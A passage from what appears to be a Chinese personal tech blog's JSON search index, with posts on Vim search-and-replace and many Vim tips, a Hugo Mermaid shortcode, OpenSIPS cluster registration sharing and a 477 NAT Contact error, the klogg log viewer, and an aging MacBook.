或者vim自带的vimgrep。\n但是我更喜欢用ripgrep,因为速度很快。\nripgrep也有对应的vim插件 https://github.com/jremmen/vim-ripgrep\n例如要搜索关键词 key1, 那么符合关键词的文件将会被放到quickfix列表中。\n:Rg key1 可以用 :copen 来打开quickfix列表。\n替换 cdo :cdo %s/key1/key2/gc c表示在替换的时候,需要手工确认每一项。\n在替换的时候,可以输入\ny (yes)执行替换 n (no)忽略此处替换 a (all)替换此处和之后的所有项目 q (quit) 退出替换过程 l (last) 替换此处后退出 ^E 向上滚动屏幕 ^Y 向下滚动屏幕 ","permalink":"https://wdd.js.org/vim/search-dir-replace/","summary":"在vscode中,可以选中一个目录,然后在目录中搜索对应的关键词,再查找到对应文件中,然后做替换。\n在vim也可以这样做。\n但是这件事要分成两步。\n根据关键词,查找文件 对多个文件进行替换 搜索关键词 搜索关键词可以用grep, 或者vim自带的vimgrep。\n但是我更喜欢用ripgrep,因为速度很快。\nripgrep也有对应的vim插件 https://github.com/jremmen/vim-ripgrep\n例如要搜索关键词 key1, 那么符合关键词的文件将会被放到quickfix列表中。\n:Rg key1 可以用 :copen 来打开quickfix列表。\n替换 cdo :cdo %s/key1/key2/gc c表示在替换的时候,需要手工确认每一项。\n在替换的时候,可以输入\ny (yes)执行替换 n (no)忽略此处替换 a (all)替换此处和之后的所有项目 q (quit) 退出替换过程 l (last) 替换此处后退出 ^E 向上滚动屏幕 ^Y 向下滚动屏幕 ","title":"搜索工作目录下的文件并替换"},{"content":" Info C表示按住Ctrl, C-o表示同时按住Ctrl和o 1. 在tmux中 vim-airline插件颜色显示不正常 解决方案:\nexport TERM=screen-256color 2. buffer相关操作 :ls # 显示所有打开的buffer :b {bufferName} #支持tab键自动补全 :bd # 关闭当前buffer :bn # 切换到下一个buffer :bp # 切换到上一个buffer :b# # 切换到上一个访问过的buffer :b1 # 切换到buffer1 :bm # 切换到最近修改过的buffer :sb {bufferName} # 上下分屏 :vert sb {bufferName} # 左右分屏 3. 跳转到对应的符号上 下面这种符号,一般都是成双成对的,只要在其中一个上按%, 就会自动跳转到对应的符号\n() [] {} 4. 关闭netrw的banner 如果熟练的是用了netrw,就可以把默认开启的banner给关闭掉。\nlet g:netrw_banner = 0 let g:netrw_liststyle = 3 let g:netrw_winsize = 25 5. 如何同时保存所有发生变化的文件? 把所有发生变化的文件给保存 :wa 把所有发生变化的文件都保存,然后退出vim :xa 退出vim, 所有发生变化的文件都不保存,:qa! 6. 插入当前时间 :r!date 7. 光标下的文件跳转 按gf可以跳转光标下的文件\nimport {say} from \u0026#39;./api\u0026#39; 也有可能跳的不准确,或者找不到,因为vim不知道文件后缀\n:set suffixesadd+=.js 8. 文件对比 如果你安装了vim, vimdiff就会自动携带\nvimdiff a.txt b.txt 9. 在插入模式快速删除 C-h 删除前一个字符 C-w 删除前一个单词 C-u 删除到行首 10. 在多行末尾增加特定的字符 例如下面的命令,可以在多行末尾增加;\n:%s/$/;/ 11. 对撤销进行撤销 u可以用来撤销,C-r可以用来对撤销进行撤销\n12. 重新读取文件 假如你对一个文件进行了一些修改,但是还没有保存,这是你想丢弃这些修改,如果用撤销的话,太麻烦。\n你可以用下面的命令,让vim重新读取磁盘上的文件,覆盖当前buffer中的文件。\n:e! 13. 对当前buffer执行外部命令 例如对go代码进行格式化\n:!go fmt % 也可以是一个json文件,我们可以用行选中之后执行:'\u0026lt;,'\u0026gt;!jq, 如果需要对全文进行json格式化,可以使用:%!jq\n{\u0026#34;name\u0026#34;:\u0026#34;wdd\u0026#34;,\u0026#34;age\u0026#34;:1} { \u0026#34;name\u0026#34;: \u0026#34;wdd\u0026#34;, \u0026#34;age\u0026#34;: 1 } Warning !和命令之间不能有空格 14. 只读模式打开文件 只读模式打开文件: vim -R file 禁止修改打开文件: vim -M file 15. 显示或者隐藏特殊字符 :set list :set nolist 16. 把另一个文件读取到当前buffer里面 b.txt是另一个文件\n# 读取到光标的位置 :read b.txt # 读区到当前buffer的开头 :0read b.txt # 读区到当前buffer的结尾 :$read b.txt 17. 把当前文件的一部分写入到另一个文件中 # 把当前文件写入到c.txt, 如果c.txt存在,则写入失败 :write c.txt # 把当前文件写入到c.txt, 如果c.txt存在,则强制写入 # 注意这里!必须紧跟着write, 并且空格是必须的,否则就是执行外部命令了 :write! c.txt # 把当前文件的当前行到文件末尾写入到c.txt :.$write c.txt # 把当前文件以追加的方式写入到另一个文件中 :write \u0026gt;\u0026gt;c.txt 18. 自带文件浏览器的必背命令 :Sex # 文件浏览器上下分布 :Vex # 文件浏览器左右分布 F1 打开帮助信息 % 创建文件 d 创建目录 D 删除文件或者目录 R 文件重命名 gh 隐藏以.开头的文件 返回上一级 t 用新的标签页面页面打开文件 c 把浏览的目录设置为当前工作的目录 19. 执行命令后,快速进入插入模式 C 从光标处删除到行尾,然后进入插入模式 S 清空当前行的内容,然后进入插入模式 s 删除光标下的字符,然后进入插入模式 O\t在当前行上插入一行,然后进入插入模式 o\t在当前行下插入一行,然后进入插入模式 I\t光标移动当当前行的一个字符前,然后进入插入模式 A\t贯标移动到当前航的最后一个字符后,然后进入插入模式 20. 必会的几个寄存器 有名寄存器 a-z 黑洞寄存器 _ 表达式寄存器 = 当前文件名寄存器 % 上次查找的模式寄存器 / 复制专用寄存器 0 C-r 是用来调用寄存器的。比如说我想粘贴当前文件名,我只需要按C-r %, 就可以自动粘贴到当前的文件中\n21. 基于tag的跳转 C-] 跳到对应tag上 C-o 跳回来 C-t 跳回来 C-w ] 在新的window中打开标签 C-w } 预览 pclose 关闭预览 22. html标签删除 dit 删除标签内部的元素 dat 删除标签 23. 原始格式粘贴 如果粘贴到vim中的文本缩进出现问题,\n:set paste 然后再执行C-v粘贴\n取消粘贴模式用 :set nopaste\n24. 按列删除或者按列保留 # 只保留第二列 :%!awk \u0026#39;{print $2}\u0026#39; # 删除第二列 :%!awk \u0026#39;{$2=\u0026#34;\u0026#34;;print $0}\u0026#39; 25. 查找多个关键词 /key1\\|key2\\|key3 26. 快速将光标所在行移动到屏幕中央 zz 26. 窗口快捷键 工作区切分窗口命令 s 水平切分窗口,新窗口仍然显示当前缓冲区 v 垂直切分窗口,新窗口仍然显示当前缓冲区 sp {file} 水平切分为当前窗口,新窗口中载入file vsp {file} 垂直切分窗口,并在新窗口载入file 窗口之间切换 w 在窗口间循环切换 h 切换到左边窗口 l 切换到右边窗口 j 切换到下边的窗口 k 切换到上边的窗口 窗口关闭 :clo[se] 关闭活动窗口 :on[ly] 关闭其他窗口 窗口改变大小 = 使所有窗口等宽等高 _ 最大化活动窗口的高度 | 最大化活动 27. 9种插入模式 i 进入插入模式,所输入新的内容将会在正常模式所在光标的前面 a 进入插入模式,所输入的新的内容将会在正常模式所在光标的后面 你知道从插入模式退出的时候,光标会向前移动一个字符吗?\n进入插入模式的技巧\ni 在光标前插入 a 在光标后插入 A 在行的末尾进入插入 I (大写的i), 在行的第一个非空白字符前进入插入模式 C 删除光标后的所有字符,然后进入插入模式 s 删除光标后的一个字符,然后进入插入模式 S 清空当前行,然后进入插入模式 o 在当前行的下面一行新建一行,并进入插入模式 O 在当前行的上面一行新建一行,并进入插入模式 28. 算数运算 ctrl a 对数字进行加运算, 如果光标不在数字上,将会自动向后移动道对应的数字上 ctrl x 对数字进行减运算 29. 可视模式快捷键 v 激活面向字符的可视模式 再按一次,可以退出 V 激活面向行的可视模式, 再按一次可以退出 ctrl v 激活面向列的可视模式 gv 重选上次的选区 o 移动选区的端点 30. 把光标所在的单词插入到Ex C-r C-w 31. 全局 文件另存为 :saveas filename 关闭当前窗口 :close 32. 光标移动 移动光标到页面顶部,中部,底部 H,M,L 移动到下个单词开头,结尾 w,e 移动到上个单词开头 b 移动光标 上下左右 k,j,h,l 移动到匹配的括号 % 移动到行首 0 移动到行首非空白字符 ^ 移动到行尾非空白字符 g 移动到行尾 $ 移动到文件第一行 gg 移动到文件最后一行 G 移动到第10行 10G 移动屏幕使光标居中 zz 跳转到上一次的位置 ctrl+o 例如你在159行,然后你按了gg, 光标调到了第一行,然后你按ctrl+o, 光标会回到159行 跳转到下一次的位置 ctrl+i 跳转到下个同样单词的地方 * 跳转到上个同样单词的地方 # 跳到字符a出现的位置 fa, Fa 调到字符a出现的前一个位置 ta, Ta 跳到之前的位置 `` 跳到之前修改的位置 `. 跳到选区的起始位置 `\u0026lt; 跳到选区的结束位置 `\u0026gt; 33. 滚动屏幕 向下,向上滚动一屏 ctrl+b, ctrl+f 向下,向上滚动半屏 ctrl+d, ctrl+u 34. 插入模式 光标前、后插入 i,a 行首,行尾插入 I, A 在当前行上、下另一起行插入 O, o 从当前单词末尾插入 ea 退出插入模式 esc 删除前一个单词 ctrl+w 删除到行首 ctrl+u 35. 编辑 替换光标下的字符 r 将下一行合并到当前行 J 将下一行合并到当前行,并一种中间的空白字符 gJ 清空当前行,并进入插入模式 cc 清空当前单词,并进入插入模式 cw 撤销修改 u 删除光标下的一个字符,然后进入插入模式 s 36. 选择文本 普通光标选择, 进入选择文本模式 v 行选择,进入选择文本模式 V 块选择,进入选择文本模式 ctrl+v 在多行行首插入注释# ctrl+v 然后选择快,然后输入I, 然后输入#, 然后按esc 注意,输入I指令时,光标只会定位到一个位置,编辑的内容也只是在一个位置,但是按了esc后,多行都会出现# 进入选择文本模式之后 选择光标所在单词(光标要先位于单词上) aw 选择光标所在()区域,包括(), 光标要先位于一个括号上 ab 选择光标所在[]区域,包括[], 光标要先位于一个括号上 aB 选择光标所在()区域,不包括(), 光标要先位于一个括号上 ib 选择光标所在[]区域,不包括[], 光标要先位于一个括号上 iB 退出可视化区域 esc 37. 选择文本命令 向左右缩进 \u0026lt;, \u0026gt; 复制 y 剪切 d 大小写转换 ~ 38. 标记 显示标记列表 :marks 标记当前位置为a ma 跳转到标记a的位置 `a 39. 剪切删除 剪切当前行 dd 剪切2行 2dd 剪切当前单词 dw 从光标所在位置剪切到行尾 D, d$ 剪切当前字符 x 删除单引号中的内容 di\u0026rsquo; da’ 删除包括' 删除双引号中的内容 di\u0026quot; da\u0026quot; 删除包括\u0026quot; 删除中括号中的内容 di[ da[ 删除包括[ 删除大括号中的内容 di{ da{ 删除包括{ 删除括号中的内容 di( da( 删除包含( 从当前光标位置,删除到到字符a dta 40. global命令 删除所有不包含匹配项的文本行 :v/re/d re可以是字符,也可以是正则 显示所有不包含匹配项的文本行 :v/re/p re可以是字符,也可以是正则 删除包含匹配项的行 :g/re/d re可以是字符,也可以是正则 显示所有包含匹配项的行 :g/re/p re可以是字符,也可以是正则 41. 文本对象 当前单词 iw 当前单词和一个空格 aw 当前句子 is 当前句子和一个空格 as 当前段落 ip 当前段落和一个空行 ap 一对圆括号 a) 或 ab 圆括号内部 i) 或 ib 一对花括号 a}或 aB 花括号内部 i}或 iB a表示匹配两点和两点之间的字符), }, ], \u0026gt; , ‘, “, `, t(xml) i表示匹配两点内部之间的字符 42. 复制 复制当前行 yy 复制2行 2yy 复制当前单词 yw 从光标所在位置复制到行尾 y$ 复制单引号中的内容 yi\u0026rsquo; ya\u0026rsquo; 复制包括' 复制双引号中的内容 yi\u0026quot; ya” 复制包括\u0026quot; 复制中括号中的内容 yi[ ya[ 复制包括[ 复制大括号中的内容 yi{ ya{ 复制包括{ 43. 粘贴 在光标后粘贴 p 在光标前粘贴 P 44. 保存退出 保存 w 保存并退出 wq 不保存退出 q! 保存所有tab页并退出 wqa 46. 查找 向下查找key /key 向上查找key ?key 下一个key n 上一个key N 移除搜索结果高亮 :noh 设置搜索高亮 :set hlsearch 统计当前模式匹配的个数 :%s///gn 47. 字符串替换 全文将old替换为new %s/old/new/g 全文将old替换为new, 但是会一个一个确认 %s/old/new/gc 48. 多文件搜索 多文件搜索 :vimgrep /key/ {file} vimgrep /export/ */ 切换到下一个文件 cn 切换到上一个文件 cp 查看搜索结果列表 copen 查看文件缓冲区 :ls 49. 窗口分割 水平分割窗口 :split 默认split仅针对当前文件,如果在新窗口打开新的文件,可以:split file 垂直分割窗口 :vsplit 打开空白的窗口 :new 关闭分割的窗口 ctrl+wq, :close 有时候ctrl+wq不管用,需要用close 窗口之间切换 ctrl+ww 切换到左边窗口 ctrl+wh 切换到右边窗口 ctrl+wl 切换到下边窗口 ctrl+wj 切换到上边窗口 ctrl+wk 关闭所有窗口 :qall 这表示 \u0026ldquo;quit all\u0026rdquo; (全部退出)。如果任何一个窗口没有存盘,Vim 都不会退出。同时光 标会自动跳到那个窗口,你可以用 \u0026ldquo;:write\u0026rdquo; 命令保存该文件或者 \u0026ldquo;:quit!\u0026rdquo; 放弃修改。 保存所有窗口修改后的内容 :wall 如果你知道有窗口被改了,而你想全部保存 关闭所有窗口,放弃所有修改 :qall! 注意,这个命令是不能撤销的。 保存所有修改,然后退出vim :wqall 窗口更多内容 http://vimcdoc.sourceforge.net/doc/usr_08.html#usr_08.txt\n50. 宏 录制宏a qa 停止录制宏 q 51. 标签页 新建标签页 tabnew 在新标签页中打开file tabnew file 切换到下个标签页 gt 切换到上个标签页 gT 关闭当前标签页 :tabclose, :tabc 关闭其他标签页 :tabo, :tabonly 在所有标签页中执行命令 :tabdo commad :tabdo w 52. 文本折叠 折叠文本内容 zfap http://vimcdoc.sourceforge.net/doc/usr_28.html#usr_28.txt 打开折叠 zo 关闭折叠 zc 展开所有折叠 zr 打开所有光标行上的折叠用 zO 关闭所有光标行上的折叠用 zC 删除一个光标行上的折叠用 zd 删除所有光标行上的折叠用 zD 53. 设置 设置vim编辑器的宽度 set columns=200 54. 自动补全 使用自动补全的下一个列表项 ctrl+n 使用自动补全的上一个列表项 ctrl+p 确认当前选择项 ctrl+y 还原最早输入项 ctrl+e 55. 杂项 在vim中执行外部命令 :!ls -al 查看当前光标所在行与百分比 ctrl+g 挂起vim, 使其在后台运行 ctrl+z 查看后台挂起的程序 jobs 使挂起的vim前台运行 fg 如果有多个后台挂起的任务, 则需要指定任务序号,如 :fg %1 在每行行尾添加字符串abc :%s/$/abc 在每行行首添加字符串abc :%s/^/abc 每行行尾删除字符串abc :%s/$/abc 每行行首删除字符串abc :%s/^/abc 删除含有abc字符串的行 :g/abc/d 删除每行行首到特定字符的内容,非贪婪匹配 : %s/^.{-}abc// var = abc123, 会删除var = abc 调换当前行和它的下一行 ddp 全文格式化 gg 跳到第一行 shift v shift g = 参考\nhttps://vim.rtorr.com/lang/zh_cn http://vimcdoc.sourceforge.net/doc/help.html https://www.oschina.net/translate/learn-vim-progressively ","permalink":"https://wdd.js.org/vim/vim-tips/","summary":"Info C表示按住Ctrl, C-o表示同时按住Ctrl和o 1. 在tmux中 vim-airline插件颜色显示不正常 解决方案:\nexport TERM=screen-256color 2. buffer相关操作 :ls # 显示所有打开的buffer :b {bufferName} #支持tab键自动补全 :bd # 关闭当前buffer :bn # 切换到下一个buffer :bp # 切换到上一个buffer :b# # 切换到上一个访问过的buffer :b1 # 切换到buffer1 :bm # 切换到最近修改过的buffer :sb {bufferName} # 上下分屏 :vert sb {bufferName} # 左右分屏 3. 跳转到对应的符号上 下面这种符号,一般都是成双成对的,只要在其中一个上按%, 就会自动跳转到对应的符号\n() [] {} 4. 关闭netrw的banner 如果熟练的是用了netrw,就可以把默认开启的banner给关闭掉。\nlet g:netrw_banner = 0 let g:netrw_liststyle = 3 let g:netrw_winsize = 25 5. 如何同时保存所有发生变化的文件? 把所有发生变化的文件给保存 :wa 把所有发生变化的文件都保存,然后退出vim :xa 退出vim, 所有发生变化的文件都不保存,:qa!","title":"1001个Vim高级技巧 - 0-55"},{"content":"增加mermaid shortcodes 在themes/YourTheme/layouts/shortcodes/mermaid.html 增加如下内容\n\u0026lt;script async type=\u0026#34;application/javascript\u0026#34; src=\u0026#34;https://cdn.jsdelivr.net/npm/mermaid@9.1.1/dist/mermaid.min.js\u0026#34;\u0026gt; var config = { startOnLoad:true, theme:\u0026#39;{{ if .Get \u0026#34;theme\u0026#34; }}{{ .Get \u0026#34;theme\u0026#34; }}{{ else }}dark{{ end }}\u0026#39;, align:\u0026#39;{{ if .Get \u0026#34;align\u0026#34; }}{{ .Get \u0026#34;align\u0026#34; }}{{ else }}center{{ end }}\u0026#39; }; mermaid.initialize(config); \u0026lt;/script\u0026gt; \u0026lt;div class=\u0026#34;mermaid\u0026#34;\u0026gt; {{.Inner}} \u0026lt;/div\u0026gt; 在blog中增加如下代码 Warning 注意下面的代码,你在实际写的时候,要把 /* 和 */ 删除 {{/*\u0026lt; mermaid align=\u0026#34;left\u0026#34; theme=\u0026#34;neutral\u0026#34; */\u0026gt;}} pie title French Words I Know \u0026#34;Merde\u0026#34; : 50 \u0026#34;Oui\u0026#34; : 35 \u0026#34;Alors\u0026#34; : 10 \u0026#34;Non\u0026#34; : 5 {{/*\u0026lt; /mermaid \u0026gt;*/}} pie title French Words I Know \"Merde\" : 50 \"Oui\" : 35 \"Alors\" : 10 \"Non\" : 5 sequenceDiagram title French Words I Know autonumber Alice-\u003e\u003eBob: hello Bob--\u003e\u003eAlice: hi Alice-\u003eBob: talking ","permalink":"https://wdd.js.org/posts/2022/05/02-hugo-add-mermaid/","summary":"增加mermaid shortcodes 在themes/YourTheme/layouts/shortcodes/mermaid.html 增加如下内容\n\u0026lt;script async type=\u0026#34;application/javascript\u0026#34; src=\u0026#34;https://cdn.jsdelivr.net/npm/mermaid@9.1.1/dist/mermaid.min.js\u0026#34;\u0026gt; var config = { startOnLoad:true, theme:\u0026#39;{{ if .Get \u0026#34;theme\u0026#34; }}{{ .Get \u0026#34;theme\u0026#34; }}{{ else }}dark{{ end }}\u0026#39;, align:\u0026#39;{{ if .Get \u0026#34;align\u0026#34; }}{{ .Get \u0026#34;align\u0026#34; }}{{ else }}center{{ end }}\u0026#39; }; mermaid.initialize(config); \u0026lt;/script\u0026gt; \u0026lt;div class=\u0026#34;mermaid\u0026#34;\u0026gt; {{.Inner}} \u0026lt;/div\u0026gt; 在blog中增加如下代码 Warning 注意下面的代码,你在实际写的时候,要把 /* 和 */ 删除 {{/*\u0026lt; mermaid align=\u0026#34;left\u0026#34; theme=\u0026#34;neutral\u0026#34; */\u0026gt;}} pie title French Words I Know \u0026#34;Merde\u0026#34; : 50 \u0026#34;Oui\u0026#34; : 35 \u0026#34;Alors\u0026#34; : 10 \u0026#34;Non\u0026#34; : 5 {{/*\u0026lt; /mermaid \u0026gt;*/}} pie title French Words I Know \"","title":"hugo博客增加mermaid 绘图插件"},{"content":"共享分机注册信息有两种方式\n集群使用相同的数据库,多个节点实时读取数据 优点:使用简单,即使所有节点重启,也能立即从数据库中恢复分机注册数据 缺点:对数据库过于依赖,一旦数据库出现性能瓶颈,则会立即影响所有的呼叫 是用cluster模块,不使用数据库,通过opensips自带的二进制同步方式 优点:不用数据库,消息处理速度快,减少对数据库的压力 缺点:一旦所有节点挂掉,所有的分机注册信息都会损失。但是挂掉所有节点的概率还是比较小的。 今天要讲的方式就是通过cluster的方式进行共享注册信息的方案。\n假设有三个节点:\n在其中一个节点上注册的分机信息会同步给其他的节点 假设其中节点a重启了,节点a会自动选择b或者c来拉取第一次初始化的分机信息 举例来说:\n8001分机在b上注册成功 b把8001的注册信息通过cluster模块通知给a和c 8002分机在a上注册成功 a把8002的注册信息通过cluster模块通知给b和c 此时整个集群有两个分机8001和8002 节点c突然崩溃重启 节点c重启之后,向b发出请求,获取所有注册的分机 节点b像节点c推送全量的分机注册信息 此时三个节点又恢复同步状态 cluster表设计:\n空的字段我就没写了,flags字段必须设置为seed, 这样节点重启后,才知道要像哪个节点同步全量数据 id,cluster_id,node_id,url,state,flags 1,1,1,bin:a:5000,1,seed 2,1,2,bin:b:5000,1,seed 3,1,3,bin:c:5000,1,seed 脚本修改:\n# 增加 bin的listen, 对应cluster表的url listen=bin:192.168.2.130:5000 # 加载proto_bin和clusterer模块 loadmodule \u0026#34;proto_bin.so\u0026#34; loadmodule \u0026#34;clusterer.so\u0026#34; modparam(\u0026#34;clusterer\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql:xxxx\u0026#34;) # 设置数据库地址 modparam(\u0026#34;clusterer\u0026#34;, \u0026#34;current_id\u0026#34;, 1) # 设置当前node_id modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;working_mode_preset\u0026#34;, \u0026#34;full-sharing-cluster\u0026#34;) modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;location_cluster\u0026#34;, 1) # 设置当前的集群id 其他操作保持原样,opensips就会自动同步分机数据了。\n","permalink":"https://wdd.js.org/opensips/ch9/cluster-share-location/","summary":"共享分机注册信息有两种方式\n集群使用相同的数据库,多个节点实时读取数据 优点:使用简单,即使所有节点重启,也能立即从数据库中恢复分机注册数据 缺点:对数据库过于依赖,一旦数据库出现性能瓶颈,则会立即影响所有的呼叫 是用cluster模块,不使用数据库,通过opensips自带的二进制同步方式 优点:不用数据库,消息处理速度快,减少对数据库的压力 缺点:一旦所有节点挂掉,所有的分机注册信息都会损失。但是挂掉所有节点的概率还是比较小的。 今天要讲的方式就是通过cluster的方式进行共享注册信息的方案。\n假设有三个节点:\n在其中一个节点上注册的分机信息会同步给其他的节点 假设其中节点a重启了,节点a会自动选择b或者c来拉取第一次初始化的分机信息 举例来说:\n8001分机在b上注册成功 b把8001的注册信息通过cluster模块通知给a和c 8002分机在a上注册成功 a把8002的注册信息通过cluster模块通知给b和c 此时整个集群有两个分机8001和8002 节点c突然崩溃重启 节点c重启之后,向b发出请求,获取所有注册的分机 节点b像节点c推送全量的分机注册信息 此时三个节点又恢复同步状态 cluster表设计:\n空的字段我就没写了,flags字段必须设置为seed, 这样节点重启后,才知道要像哪个节点同步全量数据 id,cluster_id,node_id,url,state,flags 1,1,1,bin:a:5000,1,seed 2,1,2,bin:b:5000,1,seed 3,1,3,bin:c:5000,1,seed 脚本修改:\n# 增加 bin的listen, 对应cluster表的url listen=bin:192.168.2.130:5000 # 加载proto_bin和clusterer模块 loadmodule \u0026#34;proto_bin.so\u0026#34; loadmodule \u0026#34;clusterer.so\u0026#34; modparam(\u0026#34;clusterer\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql:xxxx\u0026#34;) # 设置数据库地址 modparam(\u0026#34;clusterer\u0026#34;, \u0026#34;current_id\u0026#34;, 1) # 设置当前node_id modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;working_mode_preset\u0026#34;, \u0026#34;full-sharing-cluster\u0026#34;) modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;location_cluster\u0026#34;, 1) # 设置当前的集群id 其他操作保持原样,opensips就会自动同步分机数据了。","title":"集群共享分机注册信息"},{"content":"项目信息 github地址 https://github.com/variar/klogg\n1. 安装 klogg是个跨平台软件,windows, mac, linux都可以安装。具体安装方式参考github项目地址\n2. 界面布局 文件信息栏 日志栏 过滤器设置栏 过滤后的日志显示栏 3. 文件加载 klogg支持多种方式加载日志文件\n将日志文件拖动到klogg中 直接将常见的压缩包文件拖动到klogg中,klogger将会自动将其解压后展示 支持从http url地址下载日志,然后查看 支持从剪贴板复制日志,然后展示 4. 过滤表达式 因为klogg支持正则过滤,所以他的功能就非常强悍了。\n逻辑表达式\n表达式 例子 备注 与 and \u0026ldquo;open\u0026rdquo; and \u0026ldquo;close\u0026rdquo; 包含open,并且包含close 或 or \u0026ldquo;open\u0026rdquo; or \u0026ldquo;close\u0026rdquo; 包含open, 或者 close 非 not not(\u0026ldquo;open\u0026rdquo;) 不包含open 与或非同时支持复杂的运算,例如包含open 但是不包含close: \u0026quot;open\u0026quot; and not(\u0026quot;close\u0026quot;)\n5. 快捷方式 klogg的快捷方式很多参考了vim, vim使用者非常高兴。\n键 动作 arrows 上下或者左右移动 [number] j/k 支持用j/k上下移动 h/l 支持用h/l左右移动 ^ or $ 滚动到某行的开始或者结尾 [number] g 跳到对应的行 entered G 跳到第一行 Shift+G 跳到最后一行 Alt+G 显示跳到某一行的对话框 \u0026rsquo; or \u0026quot; 在当前屏幕快速搜索 (forward and backward) n or N 向前或者向后跳 * or . search for the next occurrence of the currently selected text / or , search for the previous occurrence of the currently selected text f 流的方式,类似 tail -f m 标记某一行,标记后的行会自动加入过滤结果中 [ or ] 跳转到上一个或者下一标记点 + or - 调整过滤窗口的尺寸 v 循环切换各种显示模式- Matches: 只显式匹配的内容- Marks: 只显式标记的内容- Marks and Matchs:显示匹配和标记的内容 (Marks and Matches -\u0026gt; Marks -\u0026gt; Matches) F5 重新加载文件 Ctrl+S Set focus to search string edit box Ctrl+Shift+O 打开对话框去选择其他文件 参考 https://github.com/variar/klogg/blob/master/DOCUMENTATION.md ","permalink":"https://wdd.js.org/posts/2022/04/cipwms/","summary":"项目信息 github地址 https://github.com/variar/klogg\n1. 安装 klogg是个跨平台软件,windows, mac, linux都可以安装。具体安装方式参考github项目地址\n2. 界面布局 文件信息栏 日志栏 过滤器设置栏 过滤后的日志显示栏 3. 文件加载 klogg支持多种方式加载日志文件\n将日志文件拖动到klogg中 直接将常见的压缩包文件拖动到klogg中,klogger将会自动将其解压后展示 支持从http url地址下载日志,然后查看 支持从剪贴板复制日志,然后展示 4. 过滤表达式 因为klogg支持正则过滤,所以他的功能就非常强悍了。\n逻辑表达式\n表达式 例子 备注 与 and \u0026ldquo;open\u0026rdquo; and \u0026ldquo;close\u0026rdquo; 包含open,并且包含close 或 or \u0026ldquo;open\u0026rdquo; or \u0026ldquo;close\u0026rdquo; 包含open, 或者 close 非 not not(\u0026ldquo;open\u0026rdquo;) 不包含open 与或非同时支持复杂的运算,例如包含open 但是不包含close: \u0026quot;open\u0026quot; and not(\u0026quot;close\u0026quot;)\n5. 快捷方式 klogg的快捷方式很多参考了vim, vim使用者非常高兴。\n键 动作 arrows 上下或者左右移动 [number] j/k 支持用j/k上下移动 h/l 支持用h/l左右移动 ^ or $ 滚动到某行的开始或者结尾 [number] g 跳到对应的行 entered G 跳到第一行 Shift+G 跳到最后一行 Alt+G 显示跳到某一行的对话框 \u0026rsquo; or \u0026quot; 在当前屏幕快速搜索 (forward and backward) n or N 向前或者向后跳 * or .","title":"klogg: 目前我最喜欢的日志查看工具"},{"content":"这个报错比较容易出现在tcp转udp的场景,可以看以下的时序图\nab之间用tcp通信,bc之间用udp通信。在通话建立后,c给b发送了bye请求,但是b发送给了c 477。正常来说b应该把bye转发给a.\n那么问题出在哪里呢?\n问题就出在update请求的响应上,update的响应200ok中带有Contact头,如果是Contact是个nat的地址,没有经过fixed nat, 那么b是无法直接给nat内部的地址发送请求的。\n处理的办法也很简单,就是在收到a返回的200ok时,执行fix_nated_contact()\n遇到这种问题,往往进入一种思维误区,就是在INVITE请求成功后,fix了nat Contact后,Contact头是不会变的。\n但是实际上,很多SIP请求,例如NOTIFY, UPDATE都会携带请求和响应都会携带Contact, 如果只处理了INVITE的Contact头,没有处理其他携带Contact的sip请求或者响应,就必然也会遇到类似的问题。\n我们知道SIP的Contact后,决定了序列化请求的request url。如果Contact处理的有问题,必然在按照request url转发的时候出现问题。\n综上所述:无论请求还是响应,都要考虑这个消息是否携带了Contact头,以及是否需要fix nat Contact。\n","permalink":"https://wdd.js.org/opensips/ch7/tm-send-failed/","summary":"这个报错比较容易出现在tcp转udp的场景,可以看以下的时序图\nab之间用tcp通信,bc之间用udp通信。在通话建立后,c给b发送了bye请求,但是b发送给了c 477。正常来说b应该把bye转发给a.\n那么问题出在哪里呢?\n问题就出在update请求的响应上,update的响应200ok中带有Contact头,如果是Contact是个nat的地址,没有经过fixed nat, 那么b是无法直接给nat内部的地址发送请求的。\n处理的办法也很简单,就是在收到a返回的200ok时,执行fix_nated_contact()\n遇到这种问题,往往进入一种思维误区,就是在INVITE请求成功后,fix了nat Contact后,Contact头是不会变的。\n但是实际上,很多SIP请求,例如NOTIFY, UPDATE都会携带请求和响应都会携带Contact, 如果只处理了INVITE的Contact头,没有处理其他携带Contact的sip请求或者响应,就必然也会遇到类似的问题。\n我们知道SIP的Contact后,决定了序列化请求的request url。如果Contact处理的有问题,必然在按照request url转发的时候出现问题。\n综上所述:无论请求还是响应,都要考虑这个消息是否携带了Contact头,以及是否需要fix nat Contact。","title":"opensips 477 Send failed (477/TM)"},{"content":"我之前写过一篇文章《macbook pro使用三年后的感受》,今天这篇文章是用4.5年的感受。\n再次梳理一下,中间遇到过的问题\n蝴蝶键盘很早有有些问题了,最近疫情在家,键盘被用坏了,J键直接坏了。只能外接键盘来用 屏幕下方出现淡红色的纹路,不太明显,基本不影响使用 中间我自己给macbook换过一次电池,换电池之前只要不插电,macbook很容易就关机了 风扇经常转,噪音有点吵,我已经觉得无所谓了 17年买这台电脑的时候,应该是9400左右。配置应该是最低配的 i5双核2.3Ghz, 8G内存,128硬盘的。\n有些人可能惊讶,128G的硬盘怎么能够用的。但是我的确够用,我的磁盘还有将近50G的剩余空间呢。\n我不是视频或者影音工作者,用的软件比较少。整个应用程序所占用的空间才4个多G。剩下的文稿可能大部分是代码。\n由于我我基本上都是远程用ssh连上nuc上开发,所以mac上的资料更少。\n但是macbook键盘坏了这个问题,是不能忍的。偶尔要移动办工的时候,不可能再带个外接键盘吧。\n是时候准备和陪伴我4.5年的电脑说再见了。\n本来想买14寸的macbook pro m1的,但是重量的增加以及很丑的刘海也是我不能忍的。\n所以我觉得我会买一台轻便点的windows笔记本,而且windows还有一个很吸引我的点,就是linux子系统。这个linux子系统,要比mac的系统更加linux。\n各位同学有没有推荐的windows的轻便笔记本呢?\n","permalink":"https://wdd.js.org/posts/2022/04/er3vob/","summary":"我之前写过一篇文章《macbook pro使用三年后的感受》,今天这篇文章是用4.5年的感受。\n再次梳理一下,中间遇到过的问题\n蝴蝶键盘很早有有些问题了,最近疫情在家,键盘被用坏了,J键直接坏了。只能外接键盘来用 屏幕下方出现淡红色的纹路,不太明显,基本不影响使用 